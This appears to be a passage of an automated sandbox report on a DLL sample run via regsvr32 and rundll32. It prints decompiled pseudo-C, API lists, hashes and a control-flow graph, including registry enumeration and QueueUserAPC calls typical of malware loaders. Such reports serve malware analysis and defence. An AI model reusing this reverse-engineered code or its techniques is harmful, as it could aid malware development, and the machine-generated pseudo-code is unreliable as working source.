                  • API String ID: 1881548302-0
                  • Opcode ID: 7a87654e1c1d56ead822fbb48c45adb1089b141f8d5014ca0f7a12000a4caef3
                  • Instruction ID: 230f4233468542b45992d4c356fbdc30eed23d9d8894d230ebd5e64d76f07138
                  • Opcode Fuzzy Hash: 7a87654e1c1d56ead822fbb48c45adb1089b141f8d5014ca0f7a12000a4caef3
                  • Instruction Fuzzy Hash: EE011E31301A4886FEDACF52E9507AA7361FB4CFC2F489025FE5A83754EF28DA588710
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 71%
                  			E0000000118000137C(void* __ecx, void* __edx, void* __edi, signed int __esi, void* __ebp, long long __rbx, long long __rcx, intOrPtr* __rdx, void* __r10) {
                  				void* __rbp;
                  				intOrPtr _t29;
                  				void* _t32;
                  				void* _t38;
                  				void* _t55;
                  				void* _t56;
                  				intOrPtr _t57;
                  				void* _t62;
                  				void* _t63;
                  				void* _t67;
                  				signed int _t76;
                  				void* _t109;
                  				void* _t117;
                  				intOrPtr _t130;
                  				long long _t134;
                  				char* _t137;
                  				intOrPtr* _t144;
                  				long _t147;
                  				long _t149;
                  				void* _t152;
                  				void* _t154;
                  				void* _t155;
                  				intOrPtr* _t159;
                  				char* _t166;
                  				void* _t168;
                  				void* _t175;
                  				long _t177;
                  				int _t180;
                  				void* _t184;
                  				void* _t186;
                  
                  				_t168 = __r10;
                  				_t144 = __rdx;
                  				_t134 = __rcx;
                  				 *((long long*)(_t154 + 0x10)) = __rbx;
                  				 *((long long*)(_t154 + 8)) = __rcx;
                  				_t155 = _t154 - 0x60;
                  				_t130 =  *0x8000d4a0;
                  				r14d = r8d;
                  				if (r8d == 0) goto 0x8000160a;
                  				_t76 = __esi | 0xffffffff;
                  				r11d = 0;
                  				r10d = 0;
                  				_t29 =  *__rdx;
                  				if (_t29 == 0xd) goto 0x80001419;
                  				if (_t29 == 0xa) goto 0x80001419;
                  				if (0 != 0) goto 0x800013ef;
                  				if (_t29 == 0x20) goto 0x800013f1;
                  				if (_t29 == 9) goto 0x800013f1;
                  				goto 0x800013f1;
                  				if (_t29 != 0x3b) goto 0x800013fd;
                  				if (r11d != 0) goto 0x8000141d;
                  				r11d = 1;
                  				if (_t29 != 0x3d) goto 0x80001407;
                  				if (0 != 0) goto 0x8000141d;
                  				if (_t29 != 0x7c) goto 0x8000141d;
                  				if (r10d != 0) goto 0x8000141d;
                  				if (1 != 0) goto 0x8000141d;
                  				r10d = 1;
                  				goto 0x8000141d;
                  				if (1 != 0) goto 0x80001424;
                  				if (1 != 0) goto 0x800013ce;
                  				if (__rdx == _t147) goto 0x8000160a;
                  				r13d = r13d - r8d;
                  				r13d = r13d - 1;
                  				r14d = r14d + r13d;
                  				r13d = 1;
                  				if (r11d == 1) goto 0x800015fb;
                  				if (1 == 0) goto 0x80001459;
                  				r12d = 1;
                  				_t5 = _t144 - 1; // -1
                  				_t55 = _t5;
                  				goto 0x8000145c;
                  				_t177 = _t147;
                  				if (_t55 == 0) goto 0x80001605;
                  				if (r10d == 0) goto 0x800014db;
                  				_t6 = _t168 - 1; // -1
                  				_t62 = _t6;
                  				if (_t62 == 0) goto 0x800014db;
                  				_t31 =  <  ? _t62 : 0x10;
                  				if (0x10 == 0) goto 0x800014ab;
                  				r9b =  *__rdx;
                  				if (r9b == dil) goto 0x800014ab;
                  				if (r9b == 0x20) goto 0x800014ab;
                  				_t109 = r9b - 9;
                  				if (_t109 == 0) goto 0x800014ab;
                  				 *((intOrPtr*)(_t155 + 0x30 - __rdx + __rdx)) = r9b;
                  				if (_t109 != 0) goto 0x8000148c;
                  				_t63 = _t62 + 1;
                  				_t32 = ( <  ? _t62 : 0x10) - 0x10 + _t76;
                  				 *((intOrPtr*)(_t155 + _t130 + 0x30)) = dil;
                  				_t166 = _t63 + __rdx;
                  				if ( *_t166 == 0x20) goto 0x800014c6;
                  				if ( *_t166 != 9) goto 0x800014cd;
                  				goto 0x800014ba;
                  				r9b =  *((intOrPtr*)(_t155 + 0x30));
                  				_t159 = __rdx + _t130;
                  				_t56 = _t55 - _t63 + 1;
                  				goto 0x800014e3;
                  				r9b = dil;
                  				 *((intOrPtr*)(_t155 + 0x30)) = dil;
                  				_t66 =  <  ? _t56 : 0x10;
                  				r11d = 0x10;
                  				if (0x10 == 0) goto 0x80001524;
                  				_t57 =  *_t159;
                  				if (_t57 == dil) goto 0x80001524;
                  				if (_t57 == 0x20) goto 0x80001524;
                  				if (_t57 == 9) goto 0x80001524;
                  				_t14 = _t134 - 0x61; // -96
                  				_t117 = _t14 - 0x19;
                  				if (_t117 > 0) goto 0x80001518;
                  				 *((char*)(_t155 + 0x48 - _t159 + _t159)) = _t57 + 0xe0;
                  				r11d = r11d + _t76;
                  				if (_t117 != 0) goto 0x800014fc;
                  				_t67 = ( <  ? _t56 : 0x10) - r11d;
                  				 *((intOrPtr*)(_t155 + __rdx + 0x48)) = dil;
                  				if (r9b != dil) goto 0x80001546;
                  				r8d = 0x10;
                  				memcpy(_t186, _t184, _t180);
                  				if (_t177 == _t147) goto 0x80001591;
                  				if (1 <= 0) goto 0x80001568;
                  				if ( *_t177 == 0x20) goto 0x8000155f;
                  				if ( *_t177 != 9) goto 0x80001568;
                  				if (1 - 1 < 0) goto 0x80001551;
                  				if (1 == 1) goto 0x80001593;
                  				_t38 = _t152 - 1;
                  				if (_t38 <= 0) goto 0x8000158c;
                  				_t137 = _t38 + _t177 + 1;
                  				if ( *_t137 == 0x20) goto 0x80001583;
                  				if ( *_t137 != 9) goto 0x8000158c;
                  				if (_t38 + _t76 > 0) goto 0x80001579;
                  				goto 0x80001593;
                  				_t22 = _t152 + 1; // 0x1
                  				r8d = _t22;
                  				HeapAlloc(_t175, _t147, _t149);
                  				if (_t130 == _t147) goto 0x800015f8;
                  				r8d = 0;
                  				memcpy(_t152, ??);
                  				 *((intOrPtr*)(__rbx + _t130)) = dil;
                  				E00000001180008C48(0xffffffff, _t130, _t155 + 0x48);
                  				r9d = 0;
                  				 *((long long*)(_t155 + 0x20)) = _t155 + 0x30;
                  				E00000001180005748(0, _t57 + 0xe0, 0, __rbx,  *((intOrPtr*)(_t155 + 0xa0)), _t177 + 1, _t130);
                  				HeapFree(??, ??, ??);
                  				if (r14d == 0) goto 0x8000160a;
                  				goto 0x800013bb;
                  				return 0xb;
                  			}

































                  0x18000137c
                  0x18000137c
                  0x18000137c
                  0x18000137c
                  0x180001381
                  0x180001391
                  0x180001395
                  0x18000139e
                  0x1800013ab
                  0x1800013b8
                  0x1800013c8
                  0x1800013cb
                  0x1800013ce
                  0x1800013d3
                  0x1800013d7
                  0x1800013db
                  0x1800013df
                  0x1800013e3
                  0x1800013ed
                  0x1800013f3
                  0x1800013f8
                  0x1800013fa
                  0x1800013ff
                  0x180001403
                  0x180001409
                  0x18000140e
                  0x180001412
                  0x180001414
                  0x180001417
                  0x18000141b
                  0x180001422
                  0x180001427
                  0x18000142d
                  0x180001430
                  0x180001433
                  0x180001436
                  0x180001440
                  0x180001448
                  0x18000144c
                  0x18000144f
                  0x18000144f
                  0x180001457
                  0x180001459
                  0x18000145e
                  0x180001467
                  0x180001469
                  0x180001469
                  0x18000146f
                  0x18000147b
                  0x180001482
                  0x18000148c
                  0x180001492
                  0x180001498
                  0x18000149a
                  0x18000149e
                  0x1800014a0
                  0x1800014a9
                  0x1800014ab
                  0x1800014ad
                  0x1800014b2
                  0x1800014b7
                  0x1800014be
                  0x1800014c4
                  0x1800014cb
                  0x1800014cd
                  0x1800014d4
                  0x1800014d7
                  0x1800014d9
                  0x1800014db
                  0x1800014de
                  0x1800014ea
                  0x1800014ed
                  0x1800014f2
                  0x1800014fc
                  0x180001502
                  0x180001507
                  0x18000150c
                  0x18000150e
                  0x180001511
                  0x180001513
                  0x180001518
                  0x18000151f
                  0x180001522
                  0x180001524
                  0x180001527
                  0x18000152f
                  0x18000153b
                  0x180001541
                  0x180001549
                  0x18000154f
                  0x180001556
                  0x18000155d
                  0x180001566
                  0x18000156a
                  0x18000156c
                  0x180001574
                  0x180001576
                  0x18000157c
                  0x180001581
                  0x18000158a
                  0x18000158f
                  0x180001593
                  0x180001593
                  0x18000159c
                  0x1800015a8
                  0x1800015aa
                  0x1800015b5
                  0x1800015c2
                  0x1800015c6
                  0x1800015d3
                  0x1800015e0
                  0x1800015e5
                  0x1800015f2
                  0x1800015fe
                  0x180001600
                  0x180001623

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Heapmemcpy$AllocFree
                  • String ID:
                  • API String ID: 1496448200-0
                  • Opcode ID: cdd274b2a0972057d5d3fa9f9dc430bb16684e370421a2ed3793fff496384978
                  • Instruction ID: 12f6b3511e6ab994a39ab68529ae422f0e798305e72f5bbead824a43ac2e6bc8
                  • Opcode Fuzzy Hash: cdd274b2a0972057d5d3fa9f9dc430bb16684e370421a2ed3793fff496384978
                  • Instruction Fuzzy Hash: AE811331704A8CCDFBF7C52998443E97AC2A3DD7C2FA9C121F982076D5ED648B8A8301
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 35%
                  			E00000001180001208(void* __edi, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, long long* __r9, char _a8, long long _a16, long long _a24, long long _a32, intOrPtr* _a40) {
                  				char _v48;
                  				long long _v56;
                  				void* _t22;
                  				void* _t24;
                  				long long _t45;
                  				long long _t59;
                  				long long _t60;
                  				void* _t70;
                  				long long* _t75;
                  				void* _t77;
                  
                  				_t58 = __rdx;
                  				_a16 = __rbx;
                  				_a24 = __rbp;
                  				_a32 = __rsi;
                  				_t45 =  *0x8000d4a0;
                  				r12d = r8d;
                  				_t77 = __rdx;
                  				if (__rdx == _t59) goto 0x80001304;
                  				if (r8d == 0) goto 0x80001304;
                  				EnterCriticalSection(??);
                  				asm("lock add dword [esi+0x40], 0x1");
                  				LeaveCriticalSection(??);
                  				_t7 =  &_a8; // -110
                  				r8d = 0;
                  				_v48 = 0;
                  				_a8 = 0;
                  				_v56 = _t59;
                  				if (E00000001180009994(_t22, r12d, __rbx, __rdx, __rdx, _t70, _t7) != 0x7a) goto 0x800012fd;
                  				r8d = _a8;
                  				_t24 = HeapAlloc(??, ??, ??);
                  				_t60 = _t45;
                  				if (_t45 == 0) goto 0x800012f8;
                  				_v48 = 0x10;
                  				_t14 =  &_a8; // -110
                  				_t75 = _t14;
                  				_v56 = __rcx + 0x72;
                  				if (E00000001180009994(_t24, r12d, __rbx, _t77, _t58, _t45, _t75) != 0) goto 0x800012e8;
                  				 *__r9 = _t60;
                  				 *_a40 = _a8;
                  				goto 0x800012fd;
                  				HeapFree(??, ??, ??);
                  				goto 0x800012fd;
                  				asm("lock add dword [esi+0x40], 0xffffffff");
                  				goto 0x80001313;
                  				 *_t75 = _t60;
                  				 *_a40 = 0;
                  				return 0;
                  			}













                  0x180001208
                  0x180001208
                  0x18000120d
                  0x180001212
                  0x180001224
                  0x180001237
                  0x18000123a
                  0x180001243
                  0x18000124c
                  0x180001256
                  0x18000125c
                  0x180001265
                  0x18000126b
                  0x180001270
                  0x180001279
                  0x18000127d
                  0x180001281
                  0x180001290
                  0x180001292
                  0x18000129c
                  0x1800012a2
                  0x1800012a8
                  0x1800012ae
                  0x1800012b6
                  0x1800012b6
                  0x1800012bb
                  0x1800012d2
                  0x1800012e0
                  0x1800012e4
                  0x1800012e6
                  0x1800012f0
                  0x1800012f6
                  0x1800012fd
                  0x180001302
                  0x18000130c
                  0x180001311
                  0x180001331

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: CriticalHeapSection$AllocEnterFreeLeave
                  • String ID:
                  • API String ID: 2939682908-0
                  • Opcode ID: 0aae2bb15498bfce2a9550a8a73fe09b0bb207132fae4a23ee3c1e61430e7fbe
                  • Instruction ID: a0890feeee0316dd0af96136dbcc6cf79a7537e396d31e91aa434a41704444e3
                  • Opcode Fuzzy Hash: 0aae2bb15498bfce2a9550a8a73fe09b0bb207132fae4a23ee3c1e61430e7fbe
                  • Instruction Fuzzy Hash: 6D314232204B88C7D761CB5AE84439AF7A4F79CBD4F548115EE9983B64DF38C64ACB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 27%
                  			E000000011800081F0(void* __ebx, void* __edx, long long __rbx, signed short* __rcx, long long __rsi, signed int** __r8, intOrPtr* __r9, void* __r11) {
                  				signed int _t22;
                  				signed int _t29;
                  				signed int* _t39;
                  				int _t54;
                  				long long _t59;
                  				void* _t62;
                  				void* _t73;
                  				signed int* _t74;
                  				long _t76;
                  				long _t79;
                  				void* _t82;
                  
                  				 *((long long*)(_t62 + 8)) = __rbx;
                  				 *((long long*)(_t62 + 0x10)) = _t59;
                  				 *((long long*)(_t62 + 0x18)) = __rsi;
                  				_t22 =  *__rcx & 0x0000ffff;
                  				_t39 = __rbx + 4;
                  				r11d = __edx;
                  				r10d = 0x57;
                  				if (__r11 - _t39 <= 0) goto 0x800082e1;
                  				_t29 =  *(__rbx +  &(__rcx[1])) & 0x0000ffff;
                  				if (__r11 -  &(__rcx[2]) < 0) goto 0x800082e1;
                  				if (_t22 == 0) goto 0x800082e1;
                  				if (_t22 - 0x200 > 0) goto 0x800082e1;
                  				if (_t29 == 0) goto 0x800082e1;
                  				if (_t29 - 0x200 > 0) goto 0x800082e1;
                  				r15d = 0x404;
                  				HeapAlloc(_t82, _t79, _t76);
                  				_t74 = _t39;
                  				if (_t39 == 0) goto 0x800082db;
                  				memset(_t73, _t54);
                  				 *_t74 = (_t22 & 0x0000fff0) << 3;
                  				memcpy(??, ??, ??);
                  				memcpy(??, ??, ??);
                  				 *__r8 = _t74;
                  				 *__r9 = r15d;
                  				r10d = 0;
                  				goto 0x800082e1;
                  				r10d = 8;
                  				return r10d;
                  			}














                  0x1800081f0
                  0x1800081f5
                  0x1800081fa
                  0x180008213
                  0x18000821d
                  0x180008221
                  0x18000822a
                  0x180008236
                  0x18000823c
                  0x18000824b
                  0x180008253
                  0x180008260
                  0x180008264
                  0x180008268
                  0x18000826a
                  0x180008278
                  0x18000827e
                  0x180008284
                  0x18000828e
                  0x1800082b0
                  0x1800082b4
                  0x1800082ca
                  0x1800082cf
                  0x1800082d2
                  0x1800082d6
                  0x1800082d9
                  0x1800082db
                  0x180008300

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: memcpy$AllocHeapmemset
                  • String ID:
                  • API String ID: 609429373-0
                  • Opcode ID: c4fa16f6dc2f2ba848d15b560345700d108723914946eadfda53ccda28d560ab
                  • Instruction ID: 28a7b8e95bc2ced4d8e1beef03e6e9b8fa3c41881149a4efc87acd56f6b93b28
                  • Opcode Fuzzy Hash: c4fa16f6dc2f2ba848d15b560345700d108723914946eadfda53ccda28d560ab
                  • Instruction Fuzzy Hash: AA21E072204B9881EB95CF57E84039A7690FB89FC4F04C425FE8A17355EE38C759C308
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: memcpy$AllocHeaplstrlen
                  • String ID:
                  • API String ID: 2888080719-0
                  • Opcode ID: f13b7d7e3ec6c9150a795e7257fff4343ad218865bc8e256d013ad43eeebd2c8
                  • Instruction ID: d7cda782a7b16298d0386595c53ef50d9ac6af49b43f80025cb93dadd90a3a02
                  • Opcode Fuzzy Hash: f13b7d7e3ec6c9150a795e7257fff4343ad218865bc8e256d013ad43eeebd2c8
                  • Instruction Fuzzy Hash: 83219E72300B9891DB56DF17A9813E9B3A1F78CBD4F498521AE490B799DE38C68AC300
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • HeapAlloc.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CA7
                  • memset.NTDLL(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CC1
                    • Part of subcall function 0000000180002464: LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476
                  • HeapAlloc.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CED
                  • InitializeCriticalSection.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008D3E
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: AllocHeap$CriticalInitializeLibraryLoadSectionmemset
                  • String ID:
                  • API String ID: 2387776105-0
                  • Opcode ID: 231236229b59fafa602483bc217cbeaa5c95870d5847978078aa8a3bfdab2cdc
                  • Instruction ID: 4870de9647b4eba85a0def977afe88a726f62592237ec59ed4fc2a31fcf765aa
                  • Opcode Fuzzy Hash: 231236229b59fafa602483bc217cbeaa5c95870d5847978078aa8a3bfdab2cdc
                  • Instruction Fuzzy Hash: 80315036200B5896EB56CF12E8143DA77A5F79CBD4F888126EE8D83795EF38D609C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: AllocHeap_snprintflstrcpylstrlen
                  • String ID:
                  • API String ID: 2416262065-0
                  • Opcode ID: d259640750b129b37f8796bde76c5520b807ee9fb10f6e5ed3310e5deffcfd7e
                  • Instruction ID: cd8941c1faf9c1b72c5725e61722f5b4f1580fba6f0a1dbc367b270ebdb23bd2
                  • Opcode Fuzzy Hash: d259640750b129b37f8796bde76c5520b807ee9fb10f6e5ed3310e5deffcfd7e
                  • Instruction Fuzzy Hash: 83316B36604B888BD7A5CF16E454B9AB7A5F38CBC4F048126EE9E83714DF39D545CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: FreeHeap$ErrorLast
                  • String ID:
                  • API String ID: 2332451156-0
                  • Opcode ID: a786c878c7dbed4c8c276b5234abe64ea54608898cee96c33fecb54f0875128f
                  • Instruction ID: 57d54ecd6ba6b12e4082159e9fbcbac62f64b62c5c275490acec5f9711af8689
                  • Opcode Fuzzy Hash: a786c878c7dbed4c8c276b5234abe64ea54608898cee96c33fecb54f0875128f
                  • Instruction Fuzzy Hash: D5215E72200B8882EB97DB63D5413A973A5EB8DFC4F589115EE4D93799DF38CA89C300
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: CriticalSection$AllocEnterHeapLeavememcpy
                  • String ID:
                  • API String ID: 224082080-0
                  • Opcode ID: fae9b1d28c530db2aae286d3ecdb8edc3b69d7174c662bcadd6a252e0811932a
                  • Instruction ID: 6c58b3867655a66680f731ed639b6ca29fd0989e7b58f2a4007a8aeeb493b1ec
                  • Opcode Fuzzy Hash: fae9b1d28c530db2aae286d3ecdb8edc3b69d7174c662bcadd6a252e0811932a
                  • Instruction Fuzzy Hash: 20112672604B5886E751CF02F888B9AB774F398BD5F958012EA9D43B54DF38C68AC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: AllocHeaplstrlenmemcpymemset
                  • String ID:
                  • API String ID: 422472530-0
                  • Opcode ID: 6855a2b0dbb2b49a0b21a1d0e345b578770580c558caf0e88c3664cb39e6b085
                  • Instruction ID: bc1187ca6e9429620bd200782e7290a68718eb3a581ccfc4400d3cdfedcb2126
                  • Opcode Fuzzy Hash: 6855a2b0dbb2b49a0b21a1d0e345b578770580c558caf0e88c3664cb39e6b085
                  • Instruction Fuzzy Hash: 49014832214B8886EB45DF26A84039977A2F78CFC0F498121EE5943B15DF38E655C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Free$AllocTime$_snprintflstrlen$FileSleepSystemlstrcat$lstrcpy
                  • String ID:
                  • API String ID: 4119021385-0
                  • Opcode ID: e922dab22075a099e2bc3cd5af4560095cea54aa65b51856932dbb75f1f0584d
                  • Instruction ID: 6db0b8cd80ef826fc55d87cfc33604410ea95bd32740a9bcb331c0de9eda71bb
                  • Opcode Fuzzy Hash: e922dab22075a099e2bc3cd5af4560095cea54aa65b51856932dbb75f1f0584d
                  • Instruction Fuzzy Hash: 05919431214A4986E785DF26E8043DAB3A1F78DFC4F548121FE4A83764EE39C60EC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 38 18000508c-1800050da HeapAlloc 39 180005419 38->39 40 1800050e0-180005112 memset InitializeCriticalSection call 180008b44 38->40 42 18000541e-18000543a 39->42 44 180005118-180005131 call 180007678 call 18000459c 40->44 45 18000540f-180005417 call 180005578 40->45 52 180005133-180005142 44->52 53 180005144 44->53 45->42 54 180005147-18000514e 52->54 53->54 56 18000515b-180005184 HeapAlloc 54->56 57 180005150-180005156 GetLastError 54->57 59 180005226 56->59 60 18000518a-1800051b0 RegOpenKeyW 56->60 58 180005408-18000540d 57->58 58->42 58->45 61 18000522b-18000522e 59->61 62 1800051b2-1800051b4 60->62 63 180005216-180005224 HeapFree 60->63 61->45 64 180005234-180005280 memcpy call 180005ca4 61->64 65 1800051cf-1800051ec RegEnumKeyW 62->65 63->61 73 180005282-18000529a call 180005ca4 64->73 74 18000529c-18000529f 64->74 67 1800051b6-1800051ca call 180009110 65->67 68 1800051ee-1800051f7 65->68 67->68 78 1800051cc 67->78 71 180005203-180005214 RegCloseKey 68->71 72 1800051f9-180005200 68->72 71->63 71->64 72->71 73->74 74->45 77 1800052a5-1800052b6 call 180006dcc 74->77 82 1800052e2-1800052e5 77->82 83 1800052b8-1800052cc call 180003c24 77->83 78->65 82->45 84 1800052eb-1800052f6 call 180008708 82->84 83->82 88 1800052ce-1800052de call 180003c24 83->88 91 180005302-180005323 84->91 92 1800052f8-1800052fd 84->92 88->82 94 180005325-18000532d 91->94 95 180005339 91->95 92->45 96 18000533c-18000533f 94->96 97 18000532f-180005337 call 180004ed8 94->97 95->96 98 180005341-180005346 96->98 99 18000534b-180005355 96->99 97->96 98->45 101 180005357-18000535f 99->101 102 18000536e 99->102 104 180005371-180005374 101->104 105 180005361-18000536c call 180004ed8 101->105 102->104 104->98 107 180005376-180005391 GetModuleHandleA 104->107 105->104 109 180005393-1800053a7 call 18000459c 107->109 110 1800053fb-180005403 call 180002b60 107->110 114 1800053a9-1800053bc GetCurrentThreadId 109->114 115 1800053be 109->115 110->58 116 1800053c1-1800053c4 114->116 115->116 116->57 117 1800053ca-1800053db call 18000459c 116->117 121 1800053dd-1800053ec QueueUserAPC 117->121 122 1800053ee 117->122 123 1800053f1-1800053f4 121->123 122->123 123->42 124 1800053f6 123->124 124->57
                  C-Code - Quality: 51%
                  			E0000000118000508C(void* __ecx, void* __esi, long long __rax, long long __rbx, long long __rcx, void* __r9) {
                  				void* __rdi;
                  				void* __rsi;
                  				void* __rbp;
                  				long _t55;
                  				long _t57;
                  				void* _t65;
                  				void* _t114;
                  				void* _t115;
                  				long long* _t146;
                  				void* _t147;
                  				void* _t153;
                  				int _t188;
                  				long long _t189;
                  				int _t191;
                  				long long _t192;
                  				struct _CRITICAL_SECTION* _t198;
                  				void* _t201;
                  				void* _t202;
                  				signed short* _t211;
                  				void* _t214;
                  				void* _t215;
                  				long long _t216;
                  				void* _t217;
                  				long _t219;
                  				long _t223;
                  				void* _t225;
                  
                  				_t154 = __rbx;
                  				_t146 = __rax;
                  				_t115 = __esi;
                  				 *((long long*)(_t201 + 0x20)) = __rbx;
                  				 *((long long*)(_t201 + 8)) = __rcx;
                  				_t202 = _t201 - 0x230;
                  				_t199 =  *0x8000d4a0;
                  				r14d =  *0x8000d498;
                  				HeapAlloc(_t225, _t223, _t219);
                  				r12d = 0;
                  				_t189 = __rax;
                  				if (__rax == _t217) goto 0x80005419;
                  				memset(_t217, _t188, _t191);
                  				InitializeCriticalSection(_t198);
                  				_t5 = _t189 + 0x98; // 0x98
                  				_t216 = _t5;
                  				 *_t216 = _t216;
                  				 *((long long*)(__rax + 0xa0)) = _t216;
                  				if (E00000001180008B44(__ecx, __rax - _t217, __rax, __rbx, _t191, __rbx, _t214) != r12d) goto 0x8000540f;
                  				E00000001180007678(__ecx, __rax, _t154, _t191);
                  				E0000000118000459C(0xdc444c2b, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
